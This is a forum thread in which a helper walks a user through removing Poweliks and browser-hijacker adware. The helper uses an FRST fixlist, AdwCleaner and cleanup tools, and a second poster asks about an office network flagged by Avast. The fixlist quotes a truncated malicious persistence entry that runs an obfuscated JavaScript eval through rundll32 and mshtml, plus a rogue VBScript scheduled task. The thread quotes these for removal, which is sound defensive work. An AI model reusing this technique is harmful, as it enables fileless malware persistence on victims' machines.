Every minute or so I’m getting the avast message about a blocked infection “URL:Mal”, with various websites being blocked. Computer is running slowly. I’ve seen in other threads that people have had this same kind of problem and users on this forum have helped fix the problem. So, per the thread “Logs to assist in cleaning malware”, I’ve attached my logs.

Note, the aswMBR log file is likely incomplete because both times I tried to run it, it would seemed to get stuck scanning on the same Windows Live file. The first time I let it run for 15 minutes extra while it was stuck on that file. The second time I ran aswMBR, it was stuck on the Windows Live file for about 5 minutes before I decided to hit the Stop button. But I still saved the log file from the first scan and attached it here, for what it’s worth.

Can anyone help me? Thank you in advance.

Hi could you temporarily uninstall Spybot as it will try to revert some of the registry changes I am going to make
The alerts should cease after the FRST fix

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:

HKU\S-1-5-21-1453027232-3423548673-3437265280-1003\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks! IFEO: [Debugger] svchost.exe SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://start.funmoods.com/results.php?f=4&q={searchTerms}&a=iron2&chnl=iron2&cd=2XzuyEtN2Y1L1QzuzzyEtB0BtB0B0A0FyEyD0DtByD0B0A0AtN0D0Tzu0CtByEtBtN1L2XzutBtFtCtFtCtFtAtCtB&cr=692770098 SearchScopes: HKLM -> {2E00D31D-D171-423D-836D-1A4D7EA7F1A9} URL = SearchScopes: HKLM-x32 -> Backup.Old.DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://start.funmoods.com/results.php?f=4&q={searchTerms}&a=iron2&chnl=iron2&cd=2XzuyEtN2Y1L1QzuzzyEtB0BtB0B0A0FyEyD0DtByD0B0A0AtN0D0Tzu0CtByEtBtN1L2XzutBtFtCtFtCtFtAtCtB&cr=692770098 SearchScopes: HKU\S-1-5-21-1453027232-3423548673-3437265280-1003 -> DefaultScope {7AA4F26E-FB62-AB97-10AB-4C0B3D4C3477} URL = http://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ir_14_40_ie&cd=2XzuyEtN2Y1L1QzuzzyEtB0BtB0B0A0FyEyD0DtByD0B0A0AtN0D0Tzu0StCtDtDzytN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2StA0F0F0CyCzyzy0EtGyDyC0ByBtGtCyB0C0CtGyD0DyB0EtGyB0Ezy0CtAzyyB0CyByDtAtB2QtN1M1F1B2Z1V1N2Y1L1Qzu2StAtCtC0CyEtAzy0EtG0E0D0AyCtGyEzytD0CtG0B0AtD0CtG0FtAyE0BtCzy0AtCtBzy0Dzy2Q&cr=434781924&ir= SearchScopes: HKU\S-1-5-21-1453027232-3423548673-3437265280-1003 -> Backup.Old.DefaultScope {95B7759C-8C7F-4BF1-B163-73684A933233} SearchScopes: HKU\S-1-5-21-1453027232-3423548673-3437265280-1003 -> {2E00D31D-D171-423D-836D-1A4D7EA7F1A9} URL = https://isearch.avg.com/search?cid={26DAEBF7-3D41-4DFF-8AEB-FB74EFFC34FC}&mid=9a9e434c49a147d6a53355626d4bac21-3e7198b96dbe95028d707e42b3e0e203711fec1f&lang=en&ds=AVG&pr=fr&d=2012-07-19 18:22:26&v=12.1.0.20&sap=dsp&q={searchTerms} SearchScopes: HKU\S-1-5-21-1453027232-3423548673-3437265280-1003 -> {4157AAB3-8976-4FF0-A085-A8EB60DC501C} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3287375&CUI=UN92209949028376266&UM=2 SearchScopes: HKU\S-1-5-21-1453027232-3423548673-3437265280-1003 -> {7AA4F26E-FB62-AB97-10AB-4C0B3D4C3477} URL = http://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ir_14_40_ie&cd=2XzuyEtN2Y1L1QzuzzyEtB0BtB0B0A0FyEyD0DtByD0B0A0AtN0D0Tzu0StCtDtDzytN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2StA0F0F0CyCzyzy0EtGyDyC0ByBtGtCyB0C0CtGyD0DyB0EtGyB0Ezy0CtAzyyB0CyByDtAtB2QtN1M1F1B2Z1V1N2Y1L1Qzu2StAtCtC0CyEtAzy0EtG0E0D0AyCtGyEzytD0CtG0B0AtD0CtG0FtAyE0BtCzy0AtCtBzy0Dzy2Q&cr=434781924&ir= SearchScopes: HKU\S-1-5-21-1453027232-3423548673-3437265280-1003 -> {95B7759C-8C7F-4BF1-B163-73684A933233} URL = http://isearch.avg.com/search?cid={26DAEBF7-3D41-4DFF-8AEB-FB74EFFC34FC}&mid=9a9e434c49a147d6a53355626d4bac21-3e7198b96dbe95028d707e42b3e0e203711fec1f&lang=en&ds=AVG&pr=fr&d=2012-07-19 18:22:26&v=15.3.0.11&pid=avg&sg=0&sap=dsp&q={searchTerms} SearchScopes: HKU\S-1-5-21-1453027232-3423548673-3437265280-1003 -> {F7A900EF-5662-4BA3-AF16-57B579D269DB} URL = http://isearch.shopathome.com?user_id={F4A5541A-DB6D-4408-9569-3453469D0361}&q={searchTerms} Toolbar: HKLM-x32 - No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File Toolbar: HKU\S-1-5-21-1453027232-3423548673-3437265280-1003 -> No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File Toolbar: HKU\S-1-5-21-1453027232-3423548673-3437265280-1003 -> No Name - {E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} - No File FF DefaultSearchEngine: Astromenda FF SelectedSearchEngine: Astromenda FF SearchPlugin: C:\Users\Valle\AppData\Roaming\Mozilla\Firefox\Profiles\nqx9qqzb.default\searchplugins\Search.xml FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\avg-secure-search.xml FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\avg-secure-search.xml FF HKLM-x32\...\Firefox\Extensions: [ocr@babylon.com] - C:\Program Files (x86)\Babylon\Babylon-Pro\Utils\ocr@babylon.com FF HKU\S-1-5-21-1453027232-3423548673-3437265280-1003\...\Firefox\Extensions: [{E5886C91-CDD7-4832-B32D-0830705A9C60}] - C:\Users\Valle\AppData\Roaming\5012 FF Extension: Java String Helper - C:\Users\Valle\AppData\Roaming\5012 [2011-03-26] FF Extension: No Name - {E5886C91-CDD7-4832-B32D-0830705A9C60} [Not Found] FF Extension: No Name - wrc@avast.com [Not Found] CHR DefaultSearchKeyword: Default -> astromenda.com CHR DefaultSearchURL: Default -> http://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ir_14_40_ie&cd=2XzuyEtN2Y1L1QzuzzyEtB0BtB0B0A0FyEyD0DtByD0B0A0AtN0D0Tzu0StCtDtDzytN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2StA0F0F0CyCzyzy0EtGyDyC0ByBtGtCyB0C0CtGyD0DyB0EtGyB0Ezy0CtAzyyB0CyByDtAtB2QtN1M1F1B2Z1V1N2Y1L1Qzu2StAtCtC0CyEtAzy0EtG0E0D0AyCtGyEzytD0CtG0B0AtD0CtG0FtAyE0BtCzy0AtCtBzy0Dzy2Q&cr=434781924&ir= CHR Plugin: (AVG Internet Security) - C:\Users\Valle\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmfkcklnlgedgbglfkkgedjfmejoahla\12.0.0.2210_0\plugins/avgnpss.dll No File 2014-11-29 21:02 - 2013-06-02 23:55 - 00000350 _____ () C:\Windows\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv.job CustomCLSID: HKU\S-1-5-21-1453027232-3423548673-3437265280-1003_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks? Task: {19A35301-2CA0-4AF8-9E5A-1551444D8A48} - System32\Tasks\4681 => Wscript.exe C:\Users\Valle\AppData\Local\Temp\launchie.vbs //B <==== ATTENTION Task: {65289688-121E-4060-AF42-3F2F77B37DEA} - System32\Tasks\0 => Iexplore.exe <==== ATTENTION Task: C:\Windows\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv.job => C:\Windows\TEMP\{028A5CD9-BB21-43BF-917B-9EB6FB5C138B}.exe C:\Users\Valle\AppData\Local\Google\Desktop\Install C:\Users\Valle\gotomypc_533.exe

Save this as fixlist.txt, in the same location as FRST.exe

https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG

Run FRST and press Fix
On completion a log will be generated please post that

THEN

Please download AdwCleaner by Xplode onto your desktop.

[*]Close all open programs and internet browsers.
[*]Double click on AdwCleaner.exe to run the tool.
[*]Click on Scan.
[*]After the scan is complete click on “Clean”
[*]Confirm each time with Ok.
[*]Your computer will be rebooted automatically. A text file will open after the restart.
[*]Please post the content of that logfile with your next answer.
[*]You can find the logfile at C:\AdwCleaner[S1].txt as well.

Thank you for replying.

OK, Spybot uninstalled (though I haven’t rebooted yet). FRST64 ran again with your file in the same folder, and I’ve attached the log it spit out.

Now let me go download adwcleaner and let that program run…

You should be noticing an improvement already

Woohoo! I think it’s solved. I was able to immediately download and start the Adwcleaner, but was called away during the reboot. Now that I’m back, my computer seems nice and quiet and fast again. Thank you. You’ve done your good deed for the day, so you can relax now. ;D

So do you have an idea of what malware caused this? Astromenda? Babylon? Funmoods? I kept seeing those names in the logs. I remember noticing Astromenda was my search engine in Firefox one day, and I went and deleted it from the search engine list. But I guess the sneaky bastard was still hiding on my system. And then the confusing one was AVG Secure Search Toolbar. That’s considered malware? Or is someone posing as AVG?

Hey, say I sleep a few times, and forget what forum I was on, and I have a friend who gets the same computer problem I just had. Would running Malwarebytes, FRST, and AdwCleaner likely clear up the problem? Cause there was also the text file fix you had me run, and I can’t understand most of what was in it. And apparently running CCleaner and Malwarebytes wasn’t enough (since that’s what I did before posting on here).

Again, thank you very much for your help.

So do you have an idea of what malware caused this? Astromenda? Babylon? Funmoods? I kept seeing those names in the logs. I remember noticing Astromenda was my search engine in Firefox one day, and I went and deleted it from the search engine list. But I guess the sneaky bastard was still hiding on my system. And then the confusing one was AVG Secure Search Toolbar. That's considered malware? Or is someone posing as AVG?

MBAM and AdwCleaner are safe enough to use on other systems however, FRST needs to have a specific script crafted to apply to that system

Subject to no further problems

I will remove my tools now and give some recommendations, but, I would like you to run for 24 hours or so and come back if you have any problems

Now the best part of the day ----- Your log now appears clean

A good workman always cleans up after himself so…The following will implement some cleanup procedures as well as reset System Restore points:

Remove tools

Download and run Delfix

https://dl.dropboxusercontent.com/u/73555776/delfix.JPG

: Keep Java Updated :

WARNING: Java is the #1 exploited program at this time. The Department of Homeland Security recommends that computer users disable Java
See this article

I would recommend that you completely uninstall Java unless you need it to run an important software.
In that instance I would recommend that you disable Java in your browsers until you need it for that software and then enable it. (See How to diasble Java in your web browser and How to unplug Java from the browser)

If you do need to keep Java then download JavaRa
Run the programme and select Remove Java Runtime. Uninstall all versions of Java present
Once done then run it again and select Update Java runtime > Download and install Latest version

https://dl.dropboxusercontent.com/u/73555776/javara.JPG

Now that you are clean, to help protect your computer in the future I recommend that you get the following free programmes:

CryptoPrevent install this programme to lock down and prevent crypto ransome ware

https://dl.dropboxusercontent.com/u/73555776/CryptoPrevent.JPG

Malwarebytes.

Update and run weekly to keep your system clean

Unchecky

Click on the link above to be taken to Unchecky.com
click the very large Download button.
click Save
Click Open folder
Right click on the Unchecky_setup and choose to Run as Administrator
Once open click the Install button.
Then click on Finish
Unchecky is now installed and will help you keep unwanted check boxes unchecked, this is a fire and forget programme

It is critical to have both a firewall and anti virus to protect your system and to keep them updated.

To learn more about how to protect yourself while on the internet read this little guide Best security practices Keep safe

Hi Avast folks!
I would like to have an official position from Avast on how to solve this problem. I found many suggestions in this forum and have spent many hours, but no easy solution (for end users) or case of successful fix is reported from people trying to fix this problem.

Problem: I started getting the popup alarm every time I connect my computer at my office. It does not happen when connect to my home network. (SEE ATTACHMENT)
Message details below:

Avast Webb Shield has blocked a harmful website or file
Object: http://www.securityverif.com/xvs.dat
Infection: URL:Mal
Program File: c:\Program Files(x86).…\firefox.exe

NOTE: Object, infection and Program file are the same in all popup messages.

Any help will be very appreciated, otherwise I will have to stop using Avast which I would like as I have it on my computer for years.

Thanks.
Luis iaderoza

Do you recognise the address it is trying to get to… Is it your network verification page ?

Thanks essexboy for your post.
No, I guess it is not my your network verification page. I have no idea which “harmful website or file” the popup message refers to. It came up even when I am not using any browser. Today I got it while when I had only Skype open.

As this only happens at your work and not at home it would tend to suggest that your network may be compromised. At the moment the domain is vacant and has been for the last week

Does this happen only when you have an internet facing programme open ?

I thought the network might be compromised, but I don’t think it is. My colleagues on the same wifi network and using different AntiVirus program don’t have any problems. I am the only one using Avast and getting this malware message.

No, it doesn’t happen only when I have an internet facing program opened. It happens even when I am composing a Word document.

Avast is (as far as I am aware) the only av that monitors outgoing connections and alerts on them, if you are using word on the network then it will be interacting with the network system. So if there is a problem then then Avast will detect it as you use the network

Thanks for your help essexboy. Very helpful!
Based on your thoughts, I confirmed I receive the popup messages on by connecting to this specific wi-fi network without opening any program. As we had another wifi network in the office I connect to another one with no popup messages from AV. It means one of our wi-fi networks has a problem and it is the causing the issue.
Any suggestions on how to resolve this issue with the specific wi-fi network to avoid the Avast popup messages?

Not really as your IT department will have to check that one network for any malware that may have inserted itself in the DNS stream